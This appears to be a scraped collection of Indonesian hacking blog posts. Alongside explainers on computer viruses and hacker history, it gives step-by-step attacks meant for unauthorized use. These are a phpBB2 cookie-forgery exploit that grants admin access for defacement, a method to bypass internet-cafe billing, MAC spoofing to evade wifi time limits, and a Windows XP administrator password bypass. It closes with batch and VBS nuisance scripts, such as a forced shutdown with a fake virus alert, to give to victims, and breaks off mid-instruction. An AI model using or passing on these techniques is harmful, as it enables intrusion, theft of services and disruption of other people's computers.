  4537. 1980, program tersebut yang akhirnya dikenal dengan nama "virus" ini berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di dunia cyber.
  4538. 1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.
  4539.  
  4540. B.PENGERTIAN VIRUS
  4541.  
  4542. " A program that can infect other programs by modifying them to include a slighty altered copy of itself.A virus can spread throughout a computer system or network using the authorization of every user using it to infect their programs. Every programs that gets infected can also act as a virus that infection grows “ ( Fred Cohen )
  4543.  
  4544. Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di Amerika Serikat. Virus komputer dinamakan “Virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran(biological viruses).
  4545. Virus komputer bisa diartikan sebagai suatu program komputer biasa.Tetapi memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini, virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi, disinilah perbedaannya dengan "worm". Tulisan ini tidak akan bahas worm karena nanti akan mengalihkan kita dari pembahasan mengenai virus ini.
  4546.  
  4547. C.KRITERIA VIRUS
  4548.  
  4549. Suatu program yang disebut virus baru dapat dikatakan adalah benar  benar virus apabila minimal memiliki 5 kriteria :
  4550. 1. Kemampuan suatu virus untuk mendapatkan informasi  
  4551. 2. Kemampuannya untuk memeriksa suatu program  
  4552. 3. Kemampuannya untuk menggandakan diri dan menularkan  
  4553. 4. Kemampuannya melakukan manipulasi    
  4554. 5. Kemampuannya untuk menyembunyikan diri.
  4555.  
  4556. Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap-tiap kemampuan itu dan mengapa ini sanggat diperlukan.
  4557.  
  4558. 1.Kemampuan untuk mendapatkan informasi
  4559. Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory, untuk apa? agar dia dapat mengenali program program apa saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, terus memilahnya dengan mencari file-file yang bisa ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan pengumpulan data dan menaruhnya di RAM (biasanya :P ) , sehingga apabila komputer dimatikan semua data hilang tetapi akan tercipta setiap program bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .
  4560.  
  4561. 2.Kemampuan memeriksa suat program
  4562. Suatu virus juga harus bias untuk memeriksa suatu program yang akan ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum, karena jika sudah maka dia akan percuma menularinya 2 kali. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah memiliki/ memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut . Contoh penandaan adalah misalnya memberikan suatu byte yang unik disetiap file yang telah terinfeksi.
  4563.  
  4564. 3.Kemampuan untuk menggandakan diri
  4565. Kalo ini emang virus "bang-get", maksudnya tanpa ini tak adalah virus. Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari program lainnya. Suatu virus apabila telah menemukan calon korbannya (baik file atau program) maka ia akan mengenalinya dengan memeriksanya, jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari dengan cara menuliskan byte pengenal pada program/ file tersebut,dan seterusnya mengcopikan/menulis kode objek virus diatas file/program yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk menulari/ menggandakan dirinya adalah:
  4566. a.File/Program yang akan ditulari dihapus atau diubah namanya. kemudian diciptakan suatu file menggunakan nama itu dengan menggunakan virus tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus)b.Program virus yang sudah di eksekusi/load ke memori akan langsung menulari file-file lain dengan cara menumpangi seluruh file/program yang ada.
  4567.  
  4568. 4.Kemampuan mengadakan manipulasi
  4569. Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file/program. isi dari suatu rutin ini dapat beragam mulai dari yang teringan sampai pengrusakan. rutin ini umumnya digunakan untuk memanipulasi program ataupun mempopulerkan pembuatnya! Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System) , sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi. misal:
  4570. a.Membuat gambar atau pesan pada monitorb.Mengganti/mengubah ubah label dari tiap file,direktori,atau label dari drive di pcc.Memanipulasi program/file yang ditularid.Merusak program/filee.Mengacaukan kerja printer , dsb
  4571.  
  4572. 5.Kemampuan Menyembunyikan diri
  4573. Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.langkah langkah yang biasa dilakukan adalah:
  4574. -Program asli/virus disimpan dalam bentuuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai.-Program virus diletakkan pada Boot Recoord atau track yang jarang diperhatikan oleh komputer itu sendiri-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak berubah ukurannya-Virus tidak mengubah keterangan waktu ssuatu file-dll
  4575.  
  4576. D.SIKLUS HIDUP VIRUS
  4577.  
  4578. Siklus hidup virus secara umum, melalui 4 tahap:
  4579. o Dormant phase ( Fase Istirahat/Tidur )Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini
  4580. o Propagation phase ( Fase Penyebaran )Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap program yang terinfeksi akan menjadi hasil “klonning” virus tersebut (tergantung cara virus tersebut menginfeksinya)
  4581. o Trigerring phase ( Fase Aktif )Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant phase
  4582. o Execution phase ( Fase Eksekusi )Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb
  4583. original from : http://www.the-cybers-skills.blogspot.com
  4584. Deface PHPBB/PHPBB2 Loser_cs_20
  4585. Saturday, September 17, 2011 2:31 AM
  4586. Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
  4587. 1. Download browser Mozilla FireFox
  4588.  
  4589. 2. Download pluginnya yg bernama LiveHTTPHeader
  4590. download di SINI
  4591. cari yg paling baru
  4592.  
  4593. 3. selanjutnya cari target dengan Uncle Google dgn syntax :
  4594. phpBB site:[terserah apa aja]
  4595.  
  4596. 4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader
  4597.  
  4598. 5. Ingat, isi LiveHTTPHeader harus kosong
  4599.  
  4600. 6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target
  4601.  
  4602. 7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..
  4603.  
  4604. 8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...
  4605.  
  4606. Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b
  4607.  
  4608. 9. Hapus bagian yg belakang setelah tanda semi colon (
  4609.  
  4610. Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b
  4611.  
  4612. \_______________hapus bagian ini_________________/
  4613.  
  4614. jadinya akan seperti ini :
  4615.  
  4616. Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
  4617.  
  4618. 10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi
  4619.  
  4620. 11. selanjutnya perhatikan langkah di bawah ini:
  4621.  
  4622. Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
  4623. \________hapus bagian ini dan di ganti dengan:
  4624.  
  4625. Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
  4626.  
  4627. 12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.
  4628.  
  4629. 13. perhatikan lagi langkah ini:
  4630.  
  4631. Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
  4632. \___________________________bagian ini jg digantilagi_______________________________/
  4633.  
  4634. menjadi seperti ini:
  4635.  
  4636. Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
  4637.  
  4638. 14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.
  4639.  
  4640. 15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
  4641. Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul
  4642. original from : http://www.the-cybers-skills.blogspot.com
  4643. Cara Mudah Hack Billing Warnet
  4644. Saturday, December 04, 2010 7:31 PM
  4645. Pertama download dulu tool HackBill, buatan anak negeri sendiri,silahkan cari di google.
  4646. Kedua periksa CMD (command) di computer kita  >> Windows+R > Ketik CMD > Enter
  4647. Kalau gak bisa “has been disable by admin” Download Tool CMD portable silahkan googling bentar.
  4648. Kalau sudah cari tahu nomor IP operator warnet tersebut, tanyain sama operatornya nomor IP nya berapa? :D , haha bercanda!. Cara cari tahu no IP nya, Buka CMD >> Windows+R > Ketik CMD > Enter
  4649. Lalu ketikan NET VIEW maka disitu akan muncul komputer-komputer yang terhubung jadi satu di warnet itu, Cari computer yang kira-kira itu adalah computer server atau operator biasanya namanya diberi embel-embel ADMIN,BILLING,OPERATOR,SERVER dll. Kalau sudah ketemu PING computer tersebut >> PINGNAMAKOMPUTER , contoh PING BILLING > enter,
  4650. Maka akan muncul nomor IP computer tersebut catat nomor ip nya,
  4651. Kalau sudah jalankan tool BillHack yang kita download tadi.
  4652. Pilih single client untuk menggratiskan computer kita sendiri, pilih all client untuk menggratiskan semua computer, mending pake yang single client saja biar enggak gede dosanya,
  4653. Lalu ketikan nomor IP yang kita catat tadi, connect pake port 1500 (port default untuk billing)
  4654. Terus tekan HACK NOW jreng!!!!, browsinglah sepuasnya
  4655. NOTE: dibilling server nickname kita sudah tidak ada, tapi di computer kita masih tetap jalan, tanyain ke operator kalau mau buktiin,
  4656. SELAMAT MENCOBA…..
  4657. original from : http://www.the-cybers-skills.blogspot.com
  4658. Hack WIFI MAC address
  4659. Saturday, September 17, 2011 2:31 AM
  4660. “MAC HACK” untuk meng-hack timing wifi
  4661. “MAAF WAKTU ANDA SUDAH HABIS, SILAHKAN KEMBALI BESOK”, pernahkah kamu mengalaminya?
  4662. Padahal kamu masih ingin ber-internet, atau terpaksa harus connect dulu karena download belum selesai, ada cara untuk mengakalinya, yaitu memperpanjang waktunya atau membuat waktu berhitung dari nol lagi. Pembatasan waktu ini sering digunakan pada tempat-tempat area wifi yang digunakan oleh orang banyak misalnya di supermarket. Langsung saja ke TKP.
  4663. PEMBATASAN WAKTU
  4664. Pembatasan  dibatasi dari access point yang ada di area tersebut, dan biasanya pembatasan tersebut menggunakan MAC address,cara kerjanya ialah merubah MAC address,sehingga kita bisa connect lagi sebagai user baru tanpa ganti Notebook.
  4665. Pertama download dulu software TMAC v4.7 disini  atau googling aja.
  4666.  
  4667. Install dan jalankan,akan muncul seperti gambar berikut:
  4668.  
  4669.  
  4670. klik tombol CHANGE MAC untuk mengganti MAC address, Trus klik RANDOM MAC ADDRESS, Nanti MAC addressnya akan di random oleh software tersebut dengan sendirinya, lalu klik CHANGE NOW, udah selesai IP address kamu sudah berubah.
  4671. Silahkan Internetan Lagi sepuasnya.
  4672. Tekan CLICK HERE maka anda akan mereset lagi dan gratis lagi.
  4673. Selamat mencoba…
  4674. original from : http://www.the-cybers-skills.blogspot.com
  4675. Hacker (peretas)
  4676. Saturday, September 17, 2011 2:31 AM
  4677.  Hacker (peretas) adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya, terutama keamanan.
  4678. Dalam penggunaan umum, hacker adalah seseorang yang menerobos masuk ke dalam komputer, biasanya dengan memperoleh akses ke kontrol administratif. Beberapa berpendapat bahwa hacker,digambarkan sebagai orang yang menerobos masuk ke dalam komputer dengan cara menerobos sistem keamanannya.di dunia ada komunitas hacker.komunitas hacker ini adalah komunitas orang yang memiliki minat besar dalam pemrograman komputer, sering menciptakan perangkat lunak open source. Orang-orang ini sekarang mengacu pada cyber-kriminal hacker sebagai "cracker".
  4679.  
  4680. Sejarah Hacker
  4681.  
  4682. Terminologi Hacker muncul pada awal tahun 1960 -an diantara para anggota organisasi mahasiswa “Tech Model Railroad Club” di Laboratorium Kecerdasan “Artifisial Massachusetts Institute of Technology” (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.
  4683. Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer “The 414s” yang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.
  4684. Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri sebagai Hacker (peretas), padahal bukan. Mereka ini yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini “cracker” dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi Hacker.
  4685. Para Hacker mengadakan pertemuan tahunan, yaitu setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan Hacker terbesar di dunia tersebut dinamakan “Def Con”. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas Hacker.
  4686.  
  4687. Hacker memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa peretaslah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus, dan lain-lain, padahal mereka adalah cracker. Cracker-lah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para peretas dipahami dibagi menjadi dua golongan: “White Hat Hackers”, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah “Black Hat Hackers”.
  4688.  
  4689. White hat hacker
  4690.  
  4691. White hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat “Cracker” yang lebih memfokuskan aksinya kepada bagaimana menerobos (merusak) sistem tersebut.
  4692. White hat hacker / Topi putih / peretas putih adalah pahlawan atau orang baik, terutama dalam bidang komputer, dimana ia menyebut etika hacker atau penetrasi penguji yang berfokus pada mengamankan dan melindungi sistem.
  4693.  
  4694. White hat hacker atau peretas suci, juga dikenal sebagai "good hacker," adalah ahli keamanan komputer, yang berspesialisasi dalam penetrasi pengujian, dan pengujian metodologi lain, untuk memastikan bahwa perusahaan sistem informasi yang aman. Pakar keamanan ini dapat memanfaatkan berbagai metode untuk melaksanakan uji coba mereka, termasuk rekayasa sosial taktik, penggunaan alat-alat hacking, dan upaya untuk menghindari keamanan untuk mendapatkan masuk ke daerah aman.
  4695. Tipe dan ciri
  4696. Black hat SEO taktik seperti spamdexing, berusaha untuk mengarahkan hasil pencarian ke halaman target tertentu dengan cara yang bertentangan dengan mesin pencari 'terms of service, sedangkan metode topi putih umumnya disetujui oleh mesin pencari. peretas putih cenderung menghasilkan hasil yang baik dan legal, sedangkan topi hitam mengantisipasi bahwa situs mereka mungkin pada akhirnya akan dilarang baik sementara atau secara permanen setelah mesin pencari menemukan apa yang mereka lakukan. Dalam industri film, topi putih adalah seseorang di barat film di mana karakter seperti akan mengenakan putih topi kontras dengan penjahat topi hitam. Contoh karakter seperti Red Ryder, Tom Mix, dan The Lone Ranger.Beberapa contoh nama white hacker yang terkenal diantaranya memiliki nama samaran(nick name) :COOL, SIX_WINGED_ANGEL, /_i_c_u_s_\, LIGHT_WING, yang berperan menekan penyebaran virus di komputer dan menghapus situs-situs penyerang yang menjebak pengunanya dengan cara menggunakan worm/virus yang memperkuat sistem anti virus bawaan dan membantu perusahaan raksasa seperti facebook and multiply.white hacker dibagi menjadi 2 tipe : Tim agresor disebut "merah", dan tim Pertahanan disebut "biru" tim.
  4697.  
  4698. Black hat hacker
  4699.  
  4700. Black hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada para peretas yang menerobos keamanan sistem komputer tanpa izin, umumnya dengan maksud untuk mengakses komputer-komputer yang terkoneksi ke jaringan tersebut. Istilah cracker diajukan oleh Richard Stallman untuk mengacu kepada peretas dalam arti ini.
  4701.  
  4702. Tokoh black hat hacker
  4703.  
  4704.  
  4705. -Kevin Mitnick
  4706. Kevin Mitnick adalah konsultan keamanan komputer dan penulis, sebelumnya sempat menjadi yang kriminal yang paling dicari dalam sejarah Amerika Serikat.
  4707.  
  4708.  
  4709.  
  4710.  
  4711.  
  4712.  
  4713.  
  4714.  
  4715.  
  4716.  
  4717. -Eric Gorden Corley
  4718. Eric Corley (juga dikenal sebagai Emmanuel Goldstein)Ia merupakan pendiri komunitas hacker.Dia telah menjadi bagian dari komunitas hacker sejak akhir tahun 70-an.
  4719.  
  4720.  
  4721.  
  4722.  
  4723.  
  4724.  
  4725.  
  4726.  
  4727.  
  4728.  
  4729. -Gordon Lyon
  4730. Dikenal dengan sebutan Fyodor, menulis tentang Security Scanner dan juga banyak buku-buku keamanan jaringan dan situs web. Dia adalah anggota pendiri Honeynet Project dan Vice President of Computer Professionals for Social Responsibility.
  4731.  
  4732.  
  4733.  
  4734.  
  4735.  
  4736.  
  4737.  
  4738.  
  4739. -Gary McKinnon
  4740. Gary McKinnon adalah hacker Inggris menghadapi ekstradisi ke Amerika Serikat untuk menghadapi tuduhan perpetrating apa yang telah digambarkan sebagai "hack komputer militer terbesar sepanjang masa."
  4741. Banyak dari mereka ditangkap dan dihukum dalam waktu yang cukup lama.Banyak para mantan black hacker yang dipekerjakan dalam bidang keamanan komputer.lawan dari black hat hacker adalah white hat hacker.Grey hacker merupakan sebutan orang yang di satu sisi membantu dan di sisi lain merusak.Salah satu white hacker yang membantu (white hacker)ber nickname.
  4742.  
  4743.  
  4744.  
  4745. -Solar Designer
  4746. Solar adalah nama pendiri Proyek Openwall.
  4747.    
  4748.  
  4749.  
  4750.  
  4751.  
  4752.  
  4753.  
  4754.  
  4755.  
  4756.                                                                                              
  4757.  
  4758.  
  4759.  
  4760. -Michal Zalewski
  4761. Michał Zalewski adalah peneliti keamanan terkemuka.
  4762.  
  4763.  
  4764.  
  4765.  
  4766.  
  4767.  
  4768.  
  4769.  
  4770.  
  4771.  
  4772.  
  4773.  
  4774. Cara melakukan hacking
  4775.  
  4776.     * Hacktivist ; hacktivis adalah hacker yang menggunakan teknologi untuk mengumumkan pandangan sosial, ideologi, agama, atau pesan politik.Dalam kasus yang lebih ekstrim, hacktivism digunakan sebagai alat untuk Cyberterrorism.
  4777.  
  4778.     * Meretas komputer ; meretas komputer merupakan Sebuah contoh umum dari eksploitasi keamanan adengan cara injeksi SQL,melalui lubang keamanan yang mungkin disebabkan dari praktek pemrograman bawah standar. Eksploitasi lain akan dapat digunakan melalui FTP, HTTP, PHP, SSH, Telnet dan beberapa halaman web.
  4779.  
  4780.     * Vulnerability scanner ; Sebuah Vulnerability scanner adalah alat yang digunakan untuk dengan cepat mengecek komputer pada jaringan untuk diketahui kelemahan.Hacker juga biasanya menggunakan port scanner.port scanner ini adalah alat untuk melihat port pada komputer tertentu untuk mengakses komputer, dan kadang-kadang akan mendeteksi program nomor versinya.firewall melindungi komputer dari penyusup dengan membatasi akses ke port
  4781.  
  4782.     * Password cracking ; Password cracking adalah sebuah aplikasi yang menangkap paket data, yang dapat digunakan untuk mencuri password dan data lain dalam transit melalui beberapa jaringan.
  4783.  
  4784.     * Trojan horse ; Trojan horse adalah program yang tampaknya akan melakukan satu hal, tetapi sebenarnya melakukan hal lain.Sebuah Trojan horse dapat digunakan untuk mendirikan sebuah pintu belakang dalam sebuah sistem komputer sedemikian rupa sehingga penyusup dapat memperoleh akses upa seckemudian. (Nama trojan horse merujuk pada kuda dari Perang Troya, dengan fungsi secara konseptual menipu para prajurit untuk membawa seorang penyusup masuk.)
  4785.  
  4786.     * Virus ; Virus adalah sebuah program replikasi diri yang menyebar dengan menyisipkan salinan dirinya ke dalam kode executable lain atau dokumen.Dengan demikian, virus komputer berperilaku mirip dengan virus biologis yang menyebar dengan memasukkan dirinya ke dalam sel-sel hidup.
  4787.  
  4788.     * Worm ; Seperti virus, worm juga merupakan program replikasi diri.Sebuah worm berbeda dari virus itu menyebar melalui jaringan komputer tanpa campur tangan pengguna.Banyak orang bingung bingung membedakan istilah "virus" dan "worm".
  4789.  
  4790.  
  4791. Hacker dalam film
  4792.  
  4793. Pada 1983 keluar pula sebuah film berjudul “War Games” yang salah satu perannya dimainkan oleh Matthew Broderick sebagai David Lightman. Film tersebut menceritakan seorang remaja penggemar komputer yang secara tidak sengaja terkoneksi dengan super komputer rahasia yang mengkontrol persenjataan nuklir Amerika Serikat.
  4794. Kemudian pada tahun 1995 keluarlah film berjudul “Hackers”, yang menceritakan pertarungan antara anak muda jago komputer bawah tanah dengan sebuah perusahaan high-tech dalam menerobos sebuah sistem komputer. Dalam film tersebut digambarkan bagaimana akhirnya anak-anak muda tersebut mampu menembus dan melumpuhkan keamanan sistem komputer perusahaan tersebut. Salah satu pemainnya adalah Angelina Jolie berperan sebagai Kate Libby alias Acid Burn.
  4795. Pada tahun yang sama keluar pula film berjudul “The Net” yang dimainkan oleh Sandra Bullock sebagai Angela Bennet. Film tersebut mengisahkan bagaimana perjuangan seorang pakar komputer wanita yang identitas dan informasi jati dirinya di dunia nyata telah diubah oleh seseorang. Dengan keluarnya dua film tersebut, maka eksistensi terminologi hacker semakin jauh dari yang pertama kali muncul di tahun 1960-an di MIT.
  4796. original from : http://www.the-cybers-skills.blogspot.com
  4797. Cara Mudah Hack Password Windows XP
  4798. Saturday, September 17, 2011 2:31 AM
  4799. Cara mudah dan klasik ini masih ampuh untuk  meng-hack password log in computer sebagai administrotor, trik  ini sangat bermanfaat untuk para pengguna computer yang lupa dengan password untuk log in ke computer mereka, namun juga banyak digunakan oleh para pihak yang berwenang. Wuihhh bahasanya,ngga usah munafik dehh, oke gak usah banyak cing-cong langsung ke TKP,
  4800. Hidupkan komputernya,
  4801. Saat proses booting pencet tombol F8, lalu pilih  "SAFE MODE"
  4802. tunggu bentar.!
  4803. Trus cepat-cepat tekan tombol Ctrl + alt + Del terus muncul deh form Log in dan Password
  4804. lalu Isi log in dengan nama Administrator dan kalau passwordnya terserah kamu, !ngat-ingat  password tersebut.
  4805. Kalo udah selesai, pencet tombol restart di CPU.
  4806. Kalo udah pencet lagi F8 Pilih “START WINDOWS NORMALLY”
  4807. Tekan lagi  Ctrl + Alt + Del
  4808.  Masukan nama log in Administrator terus password yang sudah kamu buat. ENTER
  4809. trenggg.... computer di tangan anda terserah mau di apain..!!! Salam Cybers…
  4810. original from : http://www.the-cybers-skills.blogspot.com
  4811. Mengerjai Komputer Teman Dengan Script Visual Basic Sederhana
  4812. Saturday, April 23, 2011 11:05 PM
  4813. Salam cybers...
  4814. Jika kamu pernah dikerjain orang lain atau temen kamu, kini saatnya untuk balas dendam hahaha!.
  4815. Untuk mengerjai dan menjahili computer orang kamu tahu kan “VISUAL BASIC” pemprograman dengan bahasa computer / bahasa mesin / bahasa aneh / bahasa memusingkan /
  4816. Atau lebih dikenal dengan sebutan “SCRIPT” disini akan kita buat dengan script visual basic saja Karena lebih mudah.
  4817. Pertama yaitu buka aplikasi text editor bisa notepad , wordPad,dll.
  4818. Langsung ke TKP
  4819.  
  4820. 1. mengerjai computer teman dengan Shutdown Computer terus menerus
  4821. Computer akan mati,hidup,mati lagi, bila script di jalankan!
  4822. Copy script di bawah ini ke dalam notepad:
  4823.  
  4824.  
  4825. @echo off
  4826. msg * Komputer loe Terinfeksi Virus!
  4827. shutdown -c “Error! Virus Menyebar Keseluruh System komputer!” -s -t 0
  4828.  
  4829.  
  4830. Kemudian simpan dengan nama yang kamu mau,contoh: “namafile.BAT” & Berikan kepada orang yang ingin kamu kerjain. Info: text warna merah dapat kamu ganti sesuai keinginan
  4831.  
  4832. 2.mengerjai computer teman dengan membuka,tutup,buka lagi DVD room ( Mengeject CD/DVD-Drive Terus Menerus)
  4833.  
  4834.  
  4835. Set oWMP = CreateObject(“WMPlayer.OCX.7″)
  4836. Set colCDROMs = oWMP.cdromCollection
  4837. do
  4838. if colCDROMs.Count >= 1 then
  4839. For i = 0 to colCDROMs.Count – 1
  4840. colCDROMs.Item(i).Eject
  4841. Next
  4842. For i = 0 to colCDROMs.Count – 1
  4843. colCDROMs.Item(i).Eject
  4844. Next
  4845. End If
  4846. wscript.sleep 5000
  4847. loop
  4848.  
  4849.  
  4850. lalu simpan dengan nama keinginan anda“namafile.VBS” & Berikan ke computer target,
  4851.  
  4852. 3. mengerjai orang lain  Dengan memencet Tombol ENTER Terus Menerus
  4853.  
  4854.  
  4855. Set wshShell = wscript.CreateObject(“WScript.Shell”)
  4856. do
  4857. wscript.sleep 100
  4858. wshshell.sendkeys “~(enter)”
  4859. loop
  4860.  
  4861.  
  4862. trus save dengan “namafile.VBS” & Berikan keteman Anda
  4863.  
  4864. 4. mengerjai komputer orang Dengan Pesan Lambat Notepad “Hello, how are you? I am good thanks!”
  4865.  
  4866.  
  4867. WScript.Sleep 180000
  4868. WScript.Sleep 10000
  4869. Set WshShell = WScript.CreateObject(“WScript.Shell”)
  4870. WshShell.Run “notepad”
  4871. WScript.Sleep 100
  4872. WshShell.AppActivate “Notepad”
  4873. WScript.Sleep 500
  4874. WshShell.SendKeys “Hel”
  4875. WScript.Sleep 500
  4876. WshShell.SendKeys “lo ”
  4877. WScript.Sleep 500
  4878. WshShell.SendKeys “, ho”
  4879. WScript.Sleep 500
  4880. WshShell.SendKeys “w a”
  4881. WScript.Sleep 500
  4882. WshShell.SendKeys “re ”
  4883. WScript.Sleep 500
  4884. WshShell.SendKeys “you”
  4885. WScript.Sleep 500
  4886. WshShell.SendKeys “? ”
  4887. WScript.Sleep 500
  4888. WshShell.SendKeys “I a”
  4889. WScript.Sleep 500
  4890. WshShell.SendKeys “m g”
  4891. WScript.Sleep 500
  4892. WshShell.SendKeys “ood”
  4893. WScript.Sleep 500
  4894. WshShell.SendKeys ” th”
  4895. WScript.Sleep 500
  4896. WshShell.SendKeys “ank”
  4897. WScript.Sleep 500
  4898. WshShell.SendKeys “s! “
  4899.  
  4900.  
  4901. Simpan  dengan “namafile.VBS” & Berikan keteman kamu info:kata Hello, how are you? I am good thanks! Dapat kamu ganti sesuai keinginan
  4902.  
  4903. 5. memencet Backspace terus menerus
  4904.  
  4905.  
  4906. MsgBox “Maaf, Anda Harus Mengulang Kembali”
  4907. Set wshShell =wscript.CreateObject(“WScript.Shell”)
  4908. do
  4909. wscript.sleep 100
  4910. wshshell.sendkeys “{bs}”
  4911. loop
  4912.  
  4913.  
  4914. lalu save dengan “namafile.VBS”  dan kasih ke teman kamu info:text merah dapat diganti sesuai keinginan!
  4915.  
  4916. 6. menjahili dengan Membuka Calculator Terus Menerus
  4917.  
  4918.  
  4919. @ECHO off
  4920. :top
  4921. START %SystemRoot%\system32\calc.exe
  4922. GOTO top
  4923.  
  4924.  
  4925. save dengan “namafile.BAT” & Berikan keteman kamu
  4926.  
  4927. 7. mengerjai Dengan Keyboard pesan keyboard rusak
  4928.  
  4929.  
  4930. Set wshShell = wscript.CreateObject(“WScript.Shell”)
  4931. do
  4932. wscript.sleep 100
  4933. wshshell.sendkeys “Maaf, Keyboard Tidak Berfungsi! Harap Diperbaiki”
  4934. loop
  4935.  
  4936. save dengan “namafile.VBS” & Berikan keteman Anda info:text merah dapat anda ganti!..
  4937.  
  4938.  
  4939. Puaskan Buat mengerjai/menjahili orang. Program tadi akan langsung jalan ketika file tersebut dieksekusi atau dijalankan oleh si pemakai.jika ingin jalan sendiri secara otomatis buat file autorun.inf caranya:
  4940. Buka notepad, copy kode ini
  4941.  
